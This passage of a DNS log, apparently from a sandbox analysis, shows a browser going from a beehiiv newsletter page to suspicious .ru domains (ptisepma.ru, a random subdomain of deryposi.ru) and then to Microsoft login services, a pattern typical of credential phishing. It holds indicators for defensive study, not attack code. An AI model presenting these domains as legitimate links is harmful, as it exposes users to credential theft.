                                                                                                                                            Jan 15, 2025 19:14:41.967911959 CET192.168.2.161.1.1.10xfac1Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.977210045 CET192.168.2.161.1.1.10x5933Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.977356911 CET192.168.2.161.1.1.10x2019Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.153629065 CET192.168.2.161.1.1.10xa1aaStandard query (0)client.px-cloud.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.153748989 CET192.168.2.161.1.1.10x7a12Standard query (0)client.px-cloud.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.181143045 CET192.168.2.161.1.1.10x1db1Standard query (0)stk.px-cloud.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.181349993 CET192.168.2.161.1.1.10x9336Standard query (0)stk.px-cloud.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.203336000 CET192.168.2.161.1.1.10xa62fStandard query (0)collector-pxebumdlwe.px-cloud.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.203641891 CET192.168.2.161.1.1.10xafdcStandard query (0)collector-pxebumdlwe.px-cloud.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.519192934 CET192.168.2.161.1.1.10x16d4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.519357920 CET192.168.2.161.1.1.10x330fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.533051014 CET192.168.2.161.1.1.10x49e0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.533190966 CET192.168.2.161.1.1.10x3f83Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:44.195636034 CET192.168.2.161.1.1.10x79cfStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:44.195782900 CET192.168.2.161.1.1.10xbStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:51.370878935 CET192.168.2.161.1.1.10xbef7Standard query (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ruA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:51.371014118 CET192.168.2.161.1.1.10x3fd2Standard query (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.131685019 CET192.168.2.161.1.1.10x996Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.133660078 CET192.168.2.161.1.1.10xb91fStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.152149916 CET192.168.2.161.1.1.10xb3bfStandard query (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ruA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.152281046 CET192.168.2.161.1.1.10x9f9fStandard query (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:54.226062059 CET192.168.2.161.1.1.10x6457Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:54.226160049 CET192.168.2.161.1.1.10x46efStandard query (0)www.office.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.274306059 CET192.168.2.161.1.1.10x6b0fStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.274537086 CET192.168.2.161.1.1.10xabb4Standard query (0)www.office.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:57.363181114 CET192.168.2.161.1.1.10x7c2Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:57.363436937 CET192.168.2.161.1.1.10x2e90Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:44.204672098 CET192.168.2.161.1.1.10x84fcStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:44.204792023 CET192.168.2.161.1.1.10x595fStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:53.102567911 CET192.168.2.161.1.1.10x59acStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:53.102721930 CET192.168.2.161.1.1.10xd1e9Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:54.764988899 CET192.168.2.161.1.1.10x8751Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:54.765240908 CET192.168.2.161.1.1.10x824dStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:13.868845940 CET192.168.2.161.1.1.10xb4dfStandard query (0)signup.live.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:13.869036913 CET192.168.2.161.1.1.10x1529Standard query (0)signup.live.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.488296986 CET192.168.2.161.1.1.10xeb64Standard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.488722086 CET192.168.2.161.1.1.10xb41fStandard query (0)logincdn.msftauth.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.652383089 CET192.168.2.161.1.1.10xfbeeStandard query (0)fpt.live.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.652513981 CET192.168.2.161.1.1.10xf490Standard query (0)fpt.live.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.653310061 CET192.168.2.161.1.1.10x78c0Standard query (0)msft.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.653476954 CET192.168.2.161.1.1.10xde5aStandard query (0)msft.hsprotect.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.038317919 CET192.168.2.161.1.1.10xa08dStandard query (0)signup.live.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.038559914 CET192.168.2.161.1.1.10x33ecStandard query (0)signup.live.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.656928062 CET192.168.2.161.1.1.10x3dd6Standard query (0)client.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.657372952 CET192.168.2.161.1.1.10x9bbStandard query (0)client.hsprotect.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:20.979680061 CET192.168.2.161.1.1.10xe455Standard query (0)client.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:20.979749918 CET192.168.2.161.1.1.10xde01Standard query (0)client.hsprotect.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.006768942 CET192.168.2.161.1.1.10xb69fStandard query (0)stk.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.006952047 CET192.168.2.161.1.1.10x3492Standard query (0)stk.hsprotect.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.026664019 CET192.168.2.161.1.1.10x6f62Standard query (0)collector-pxzc5j78di.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.026899099 CET192.168.2.161.1.1.10xefceStandard query (0)collector-pxzc5j78di.hsprotect.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.242508888 CET192.168.2.161.1.1.10xb0aaStandard query (0)fpt.live.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.242635012 CET192.168.2.161.1.1.10xf9b4Standard query (0)fpt.live.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.785567999 CET192.168.2.161.1.1.10x909fStandard query (0)collector-pxzc5j78di.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.785726070 CET192.168.2.161.1.1.10x8e5fStandard query (0)collector-pxzc5j78di.hsprotect.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.826041937 CET192.168.2.161.1.1.10x29daStandard query (0)stk.hsprotect.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.826179028 CET192.168.2.161.1.1.10x85efStandard query (0)stk.hsprotect.net65IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Jan 15, 2025 19:14:30.218681097 CET1.1.1.1192.168.2.160xf05fNo error (0)kanes-newsletter-871ead.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:30.218681097 CET1.1.1.1192.168.2.160xf05fNo error (0)kanes-newsletter-871ead.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:30.221328974 CET1.1.1.1192.168.2.160x5dd5No error (0)kanes-newsletter-871ead.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.892085075 CET1.1.1.1192.168.2.160x82a1No error (0)media.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.892085075 CET1.1.1.1192.168.2.160x82a1No error (0)media.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.893335104 CET1.1.1.1192.168.2.160x48a2No error (0)media.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)beehiiv-adnetwork-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com3.5.3.19A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com16.15.192.152A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com3.5.20.158A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com16.15.185.195A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com3.5.25.122A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com52.217.13.188A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com3.5.8.150A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET1.1.1.1192.168.2.160x5076No error (0)s3-w.us-east-1.amazonaws.com54.231.160.193A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.906615019 CET1.1.1.1192.168.2.160x6547No error (0)beehiiv-adnetwork-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.906615019 CET1.1.1.1192.168.2.160x6547No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.166883945 CET1.1.1.1192.168.2.160xd859No error (0)kanes-newsletter-871ead.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.166883945 CET1.1.1.1192.168.2.160xd859No error (0)kanes-newsletter-871ead.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.169874907 CET1.1.1.1192.168.2.160xb538No error (0)kanes-newsletter-871ead.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.561371088 CET1.1.1.1192.168.2.160x2bf5No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.562091112 CET1.1.1.1192.168.2.160xc9c8No error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.562207937 CET1.1.1.1192.168.2.160xcd90No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.562263966 CET1.1.1.1192.168.2.160x10e5No error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.562263966 CET1.1.1.1192.168.2.160x10e5No error (0)platform.twitter.map.fastly.net146.75.120.157A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.589000940 CET1.1.1.1192.168.2.160xbaf5No error (0)media.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.589000940 CET1.1.1.1192.168.2.160xbaf5No error (0)media.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.591223001 CET1.1.1.1192.168.2.160x721No error (0)media.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.627443075 CET1.1.1.1192.168.2.160x5dcdNo error (0)beehiiv-adnetwork-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.627443075 CET1.1.1.1192.168.2.160x5dcdNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)beehiiv-adnetwork-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com16.15.184.174A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com54.231.165.113A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com16.15.193.117A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com3.5.24.104A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com52.217.199.73A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com16.182.72.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com54.231.168.209A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET1.1.1.1192.168.2.160x2989No error (0)s3-w.us-east-1.amazonaws.com16.182.67.241A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.681432962 CET1.1.1.1192.168.2.160xcc33No error (0)lf16-tiktok-web.tiktokcdn-us.comlf16-tiktok-web.tiktokcdn-us.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.683290005 CET1.1.1.1192.168.2.160xad4aNo error (0)lf16-tiktok-web.tiktokcdn-us.comlf16-tiktok-web.tiktokcdn-us.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.828530073 CET1.1.1.1192.168.2.160xdb52No error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.828530073 CET1.1.1.1192.168.2.160xdb52No error (0)platform.twitter.map.fastly.net146.75.120.157A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.829041958 CET1.1.1.1192.168.2.160x4f8eNo error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.842940092 CET1.1.1.1192.168.2.160x38c4No error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.842940092 CET1.1.1.1192.168.2.160x38c4No error (0)platform.twitter.map.fastly.net146.75.120.157A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.843389034 CET1.1.1.1192.168.2.160x4f90No error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.124018908 CET1.1.1.1192.168.2.160xdd27No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.124371052 CET1.1.1.1192.168.2.160x3499No error (0)www.google.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.462028027 CET1.1.1.1192.168.2.160xe5d6No error (0)lf16-tiktok-web.tiktokcdn-us.comlf16-tiktok-web.tiktokcdn-us.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.462454081 CET1.1.1.1192.168.2.160x55c8No error (0)lf16-tiktok-web.tiktokcdn-us.comlf16-tiktok-web.tiktokcdn-us.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.164803982 CET1.1.1.1192.168.2.160x8b48No error (0)syndication.twitter.com104.244.42.136A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.164803982 CET1.1.1.1192.168.2.160x8b48No error (0)syndication.twitter.com104.244.42.200A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.164803982 CET1.1.1.1192.168.2.160x8b48No error (0)syndication.twitter.com104.244.42.72A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.164803982 CET1.1.1.1192.168.2.160x8b48No error (0)syndication.twitter.com104.244.42.8A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.912162066 CET1.1.1.1192.168.2.160xb01bNo error (0)syndication.twitter.com104.244.42.136A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.912162066 CET1.1.1.1192.168.2.160xb01bNo error (0)syndication.twitter.com104.244.42.8A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.912162066 CET1.1.1.1192.168.2.160xb01bNo error (0)syndication.twitter.com104.244.42.72A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.912162066 CET1.1.1.1192.168.2.160xb01bNo error (0)syndication.twitter.com104.244.42.200A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.057981968 CET1.1.1.1192.168.2.160x1ed2No error (0)2u9o.ptisepma.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.057981968 CET1.1.1.1192.168.2.160x1ed2No error (0)2u9o.ptisepma.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.105674028 CET1.1.1.1192.168.2.160xd967No error (0)2u9o.ptisepma.ru65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.272445917 CET1.1.1.1192.168.2.160x7cabNo error (0)o922922.ingest.us.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.889338017 CET1.1.1.1192.168.2.160xf7beNo error (0)client.px-cloud.netclient.px-cloud.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.892029047 CET1.1.1.1192.168.2.160xb4b1No error (0)client.px-cloud.netclient.px-cloud.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.894433975 CET1.1.1.1192.168.2.160xa018No error (0)embed.bsky.app13.59.241.142A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.894433975 CET1.1.1.1192.168.2.160xa018No error (0)embed.bsky.app3.141.204.121A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.894433975 CET1.1.1.1192.168.2.160xa018No error (0)embed.bsky.app18.220.176.90A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.949763060 CET1.1.1.1192.168.2.160xf66eNo error (0)o922922.ingest.us.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180649996 CET1.1.1.1192.168.2.160xd08No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180649996 CET1.1.1.1192.168.2.160xd08No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180649996 CET1.1.1.1192.168.2.160xd08No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180649996 CET1.1.1.1192.168.2.160xd08No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180866003 CET1.1.1.1192.168.2.160xf98aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180866003 CET1.1.1.1192.168.2.160xf98aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.180943966 CET1.1.1.1192.168.2.160x7ac0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.181140900 CET1.1.1.1192.168.2.160x57faNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.181140900 CET1.1.1.1192.168.2.160x57faNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.181265116 CET1.1.1.1192.168.2.160x8e51No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.681814909 CET1.1.1.1192.168.2.160x1edNo error (0)embed.bsky.app18.220.176.90A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.681814909 CET1.1.1.1192.168.2.160x1edNo error (0)embed.bsky.app3.141.204.121A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.681814909 CET1.1.1.1192.168.2.160x1edNo error (0)embed.bsky.app13.59.241.142A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.974920988 CET1.1.1.1192.168.2.160x32c0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.974920988 CET1.1.1.1192.168.2.160x32c0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.974920988 CET1.1.1.1192.168.2.160x32c0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.974920988 CET1.1.1.1192.168.2.160x32c0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.984299898 CET1.1.1.1192.168.2.160x5933No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.984299898 CET1.1.1.1192.168.2.160x5933No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.984323978 CET1.1.1.1192.168.2.160x2019No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.161247015 CET1.1.1.1192.168.2.160xa1aaNo error (0)client.px-cloud.netclient.px-cloud.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.161885023 CET1.1.1.1192.168.2.160x7a12No error (0)client.px-cloud.netclient.px-cloud.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.188466072 CET1.1.1.1192.168.2.160x1db1No error (0)stk.px-cloud.net34.107.199.61A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.211690903 CET1.1.1.1192.168.2.160xa62fNo error (0)collector-pxebumdlwe.px-cloud.net35.190.10.96A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.526168108 CET1.1.1.1192.168.2.160x330fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.526339054 CET1.1.1.1192.168.2.160x16d4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.526339054 CET1.1.1.1192.168.2.160x16d4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.540183067 CET1.1.1.1192.168.2.160x49e0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.540183067 CET1.1.1.1192.168.2.160x49e0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:42.541023016 CET1.1.1.1192.168.2.160x3f83No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:44.202433109 CET1.1.1.1192.168.2.160x79cfNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:51.425441980 CET1.1.1.1192.168.2.160x3fd2No error (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:51.427370071 CET1.1.1.1192.168.2.160xbef7No error (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:51.427370071 CET1.1.1.1192.168.2.160xbef7No error (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.138590097 CET1.1.1.1192.168.2.160x996No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.141340017 CET1.1.1.1192.168.2.160xb91fNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.159888029 CET1.1.1.1192.168.2.160x9f9fNo error (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:53.203562021 CET1.1.1.1192.168.2.160xb3bfNo error (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
